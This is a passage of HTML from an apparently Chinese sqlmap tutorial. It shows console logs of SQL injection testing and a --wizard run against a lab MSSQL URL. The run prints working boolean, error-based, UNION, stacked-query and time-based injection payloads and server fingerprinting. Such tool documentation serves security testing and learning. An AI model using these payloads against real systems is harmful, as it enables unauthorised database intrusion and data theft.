style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;if&nbsp;GET&nbsp;parameter&nbsp;&#8216;ca&#8217;&nbsp;is&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[WARNING]&nbsp;GET&nbsp;parameter&nbsp;&#8216;ca&#8217;&nbsp;does&nbsp;not&nbsp;appear&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[WARNING]&nbsp;heuristic&nbsp;(basic)&nbsp;test&nbsp;shows&nbsp;that&nbsp;GET&nbsp;parameter&nbsp;&#8216;ca&#8217;&nbsp;might&nbsp;not&nbsp;be&nbsp;injectable<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;skipping&nbsp;GET&nbsp;parameter&nbsp;&#8216;ca&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;if&nbsp;GET&nbsp;parameter&nbsp;&#8216;user&#8217;&nbsp;is&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[WARNING]&nbsp;GET&nbsp;parameter&nbsp;&#8216;user&#8217;&nbsp;does&nbsp;not&nbsp;appear&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[WARNING]&nbsp;heuristic&nbsp;(basic)&nbsp;test&nbsp;shows&nbsp;that&nbsp;GET&nbsp;parameter&nbsp;&#8216;user&#8217;&nbsp;might&nbsp;not&nbsp;be&nbsp;injectable<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;skipping&nbsp;GET&nbsp;parameter&nbsp;&#8216;user&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;if&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;confirming&nbsp;that&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;dynamic<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[WARNING]&nbsp;reflective&nbsp;value(s)&nbsp;found&nbsp;and&nbsp;filtering&nbsp;out<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;heuristic&nbsp;(basic)&nbsp;test&nbsp;shows&nbsp;that&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;might&nbsp;be&nbsp;injectable&nbsp;(possible&nbsp;DBMS:&nbsp;&#8216;MySQL&#8217;)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;for&nbsp;SQL&nbsp;injection&nbsp;on&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">heuristic&nbsp;(parsing)&nbsp;test&nbsp;showed&nbsp;that&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;could&nbsp;be&nbsp;&#8216;MySQL&#8217;.&nbsp;Do&nbsp;you&nbsp;want&nbsp;to&nbsp;skip&nbsp;test&nbsp;payloads&nbsp;specific&nbsp;for&nbsp;other&nbsp;DBMSes?&nbsp;[Y\/n]&nbsp;Y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;include&nbsp;all&nbsp;tests&nbsp;for&nbsp;&#8216;MySQL&#8217;&nbsp;extending&nbsp;provided&nbsp;level&nbsp;(1)&nbsp;and&nbsp;risk&nbsp;(1)?&nbsp;[Y\/n]&nbsp;Y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;AND&nbsp;boolean-based&nbsp;blind&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;&#8216;AND&nbsp;boolean-based&nbsp;blind&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause&#8217;&nbsp;injectable&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;&gt;=&nbsp;5.0&nbsp;AND&nbsp;error-based&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;&#8216;MySQL&nbsp;&gt;=&nbsp;5.0&nbsp;AND&nbsp;error-based&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause&#8217;&nbsp;injectable&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;inline&nbsp;queries&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;&gt;&nbsp;5.0.11&nbsp;stacked&nbsp;queries&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;&lt;&nbsp;5.0.12&nbsp;stacked&nbsp;queries&nbsp;(heavy&nbsp;query)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:14]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;&gt;&nbsp;5.0.11&nbsp;AND&nbsp;time-based&nbsp;blind&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:24]&nbsp;[INFO]&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;&#8216;MySQL&nbsp;&gt;&nbsp;5.0.11&nbsp;AND&nbsp;time-based&nbsp;blind&#8217;&nbsp;injectable&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:24]&nbsp;[INFO]&nbsp;testing&nbsp;&#8216;MySQL&nbsp;UNION&nbsp;query&nbsp;(NULL)&nbsp;&#8211;&nbsp;1&nbsp;to&nbsp;20&nbsp;columns&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:24]&nbsp;[INFO]&nbsp;automatically&nbsp;extending&nbsp;ranges&nbsp;for&nbsp;UNION&nbsp;query&nbsp;injection&nbsp;technique&nbsp;tests&nbsp;as&nbsp;there&nbsp;is&nbsp;at&nbsp;least&nbsp;one&nbsp;other&nbsp;potential&nbsp;injection&nbsp;technique&nbsp;found<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:24]&nbsp;[INFO]&nbsp;ORDER&nbsp;BY&nbsp;technique&nbsp;seems&nbsp;to&nbsp;be&nbsp;usable.&nbsp;This&nbsp;should&nbsp;reduce&nbsp;the&nbsp;time&nbsp;needed&nbsp;to&nbsp;find&nbsp;the&nbsp;right&nbsp;number&nbsp;of&nbsp;query&nbsp;columns.&nbsp;Automatically&nbsp;extending&nbsp;the&nbsp;range&nbsp;for&nbsp;current&nbsp;UNION&nbsp;query&nbsp;injection&nbsp;technique&nbsp;test<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:24]&nbsp;[INFO]&nbsp;target&nbsp;URL&nbsp;appears&nbsp;to&nbsp;have&nbsp;3&nbsp;columns&nbsp;in&nbsp;query<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:24]&nbsp;[INFO]&nbsp;GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;&#8216;MySQL&nbsp;UNION&nbsp;query&nbsp;(NULL)&nbsp;&#8211;&nbsp;1&nbsp;to&nbsp;20&nbsp;columns&#8217;&nbsp;injectable<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%9D%E7%BA%A7%E7%94%A8%E6%88%B7%E5%90%91%E5%AF%BC%E5%8F%82%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u521d\u7ea7\u7528\u6237\u5411\u5bfc\u53c2\u6570<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;wizard&nbsp;<\/span><span>\u9762\u5411\u521d\u7ea7\u7528\u6237\u7684\u53c2\u6570\uff0c\u53ef\u4ee5\u4e00\u6b65\u4e00\u6b65\u6559\u4f60\u5982\u4f55\u8f93\u5165\u9488\u5bf9\u76ee\u6807\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;&#8211;wizard<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;sqlmap\/1.0-dev-2defc30&nbsp;&#8211;&nbsp;automatic&nbsp;SQL&nbsp;injection&nbsp;and&nbsp;database&nbsp;takeover&nbsp;tool<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">http:\/\/sqlmap.org<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[!]&nbsp;legal&nbsp;disclaimer:&nbsp;Usage&nbsp;of&nbsp;sqlmap&nbsp;for&nbsp;attacking&nbsp;targets&nbsp;without&nbsp;prior&nbsp;mutual&nbsp;consent&nbsp;is&nbsp;illegal.&nbsp;It&nbsp;is&nbsp;the&nbsp;end&nbsp;user&#8217;s&nbsp;responsibility&nbsp;to&nbsp;obey&nbsp;all&nbsp;applicable&nbsp;local,&nbsp;state&nbsp;and&nbsp;federal&nbsp;laws.&nbsp;Developers&nbsp;assume&nbsp;no&nbsp;liability&nbsp;and&nbsp;are&nbsp;not&nbsp;responsible&nbsp;for&nbsp;any&nbsp;misuse&nbsp;or&nbsp;damage&nbsp;caused&nbsp;by&nbsp;this&nbsp;program<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;starting&nbsp;at&nbsp;11:25:26<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Please&nbsp;enter&nbsp;full&nbsp;target&nbsp;URL&nbsp;(-u):&nbsp;http:\/\/192.168.21.129\/sqlmap\/mssql\/iis\/get_int.asp?id=1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">POST&nbsp;data&nbsp;(&#8211;data)&nbsp;[Enter&nbsp;for&nbsp;None]:&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Injection&nbsp;difficulty&nbsp;(&#8211;level\/&#8211;risk).&nbsp;Please&nbsp;choose:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;Normal&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;Medium<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3]&nbsp;Hard<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Enumeration&nbsp;(&#8211;banner\/&#8211;current-user\/etc).&nbsp;Please&nbsp;choose:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;Basic&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;Smart<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3]&nbsp;All<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">sqlmap&nbsp;is&nbsp;running,&nbsp;please&nbsp;wait..<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">heuristic&nbsp;(parsing)&nbsp;test&nbsp;showed&nbsp;that&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;could&nbsp;be&nbsp;&#8216;Microsoft&nbsp;SQL&nbsp;Server&#8217;.&nbsp;Do&nbsp;you&nbsp;want&nbsp;to&nbsp;skip&nbsp;test&nbsp;payloads&nbsp;specific&nbsp;for&nbsp;other&nbsp;DBMSes?&nbsp;[Y\/n]&nbsp;Y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;include&nbsp;all&nbsp;tests&nbsp;for&nbsp;&#8216;Microsoft&nbsp;SQL&nbsp;Server&#8217;&nbsp;extending&nbsp;provided&nbsp;level&nbsp;(1)&nbsp;and&nbsp;risk&nbsp;(1)?&nbsp;[Y\/n]&nbsp;Y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">GET&nbsp;parameter&nbsp;&#8216;id&#8217;&nbsp;is&nbsp;vulnerable.&nbsp;Do&nbsp;you&nbsp;want&nbsp;to&nbsp;keep&nbsp;testing&nbsp;the&nbsp;others&nbsp;(if&nbsp;any)?&nbsp;[y\/N]&nbsp;N<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">sqlmap&nbsp;identified&nbsp;the&nbsp;following&nbsp;injection&nbsp;points&nbsp;with&nbsp;a&nbsp;total&nbsp;of&nbsp;25&nbsp;HTTP(s)&nbsp;requests:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8212;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Place:&nbsp;GET<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Parameter:&nbsp;id<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Type:&nbsp;boolean-based&nbsp;blind<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;AND&nbsp;boolean-based&nbsp;blind&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Payload:&nbsp;id=1&nbsp;AND&nbsp;2986=2986<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Type:&nbsp;error-based<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;Microsoft&nbsp;SQL&nbsp;Server\/Sybase&nbsp;AND&nbsp;error-based&nbsp;&#8211;&nbsp;WHERE&nbsp;or&nbsp;HAVING&nbsp;clause<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Payload:&nbsp;id=1&nbsp;AND&nbsp;4847=CONVERT(INT,(CHAR(58)&nbsp;CHAR(118)&nbsp;CHAR(114)&nbsp;CHAR(100)&nbsp;CHAR(58)&nbsp;(SELECT&nbsp;(CASE&nbsp;WHEN&nbsp;(4847=4847)&nbsp;THEN&nbsp;CHAR(49)&nbsp;ELSE&nbsp;CHAR(48)&nbsp;END))&nbsp;CHAR(58)&nbsp;CHAR(111)&nbsp;CHAR(109)&nbsp;CHAR(113)&nbsp;CHAR(58)))<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Type:&nbsp;UNION&nbsp;query<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;Generic&nbsp;UNION&nbsp;query&nbsp;(NULL)&nbsp;&#8211;&nbsp;3&nbsp;columns<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Payload:&nbsp;id=1&nbsp;UNION&nbsp;ALL&nbsp;SELECT&nbsp;NULL,NULL,CHAR(58)&nbsp;CHAR(118)&nbsp;CHAR(114)&nbsp;CHAR(100)&nbsp;CHAR(58)&nbsp;CHAR(70)&nbsp;CHAR(79)&nbsp;CHAR(118)&nbsp;CHAR(106)&nbsp;CHAR(87)&nbsp;CHAR(101)&nbsp;CHAR(119)&nbsp;CHAR(115)&nbsp;CHAR(114)&nbsp;CHAR(77)&nbsp;CHAR(58)&nbsp;CHAR(111)&nbsp;CHAR(109)&nbsp;CHAR(113)&nbsp;CHAR(58)&#8211;&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Type:&nbsp;stacked&nbsp;queries<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;Microsoft&nbsp;SQL&nbsp;Server\/Sybase&nbsp;stacked&nbsp;queries<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Payload:&nbsp;id=1;&nbsp;WAITFOR&nbsp;DELAY&nbsp;&#8216;0:0:5&#8217;&#8211;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Type:&nbsp;AND\/OR&nbsp;time-based&nbsp;blind<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;Microsoft&nbsp;SQL&nbsp;Server\/Sybase&nbsp;time-based&nbsp;blind<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Payload:&nbsp;id=1&nbsp;WAITFOR&nbsp;DELAY&nbsp;&#8216;0:0:5&#8217;&#8211;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Type:&nbsp;inline&nbsp;query<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;Microsoft&nbsp;SQL&nbsp;Server\/Sybase&nbsp;inline&nbsp;queries<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;Payload:&nbsp;id=(SELECT&nbsp;CHAR(58)&nbsp;CHAR(118)&nbsp;CHAR(114)&nbsp;CHAR(100)&nbsp;CHAR(58)&nbsp;(SELECT&nbsp;(CASE&nbsp;WHEN&nbsp;(6382=6382)&nbsp;THEN&nbsp;CHAR(49)&nbsp;ELSE&nbsp;CHAR(48)&nbsp;END))&nbsp;CHAR(58)&nbsp;CHAR(111)&nbsp;CHAR(109)&nbsp;CHAR(113)&nbsp;CHAR(58))<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8212;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;server&nbsp;operating&nbsp;system:&nbsp;Windows&nbsp;XP<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;ASP,&nbsp;Microsoft&nbsp;IIS&nbsp;5.1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS&nbsp;operating&nbsp;system:&nbsp;Windows&nbsp;XP&nbsp;Service&nbsp;Pack&nbsp;2<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;Microsoft&nbsp;SQL&nbsp;Server&nbsp;2005<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">banner:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8212;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 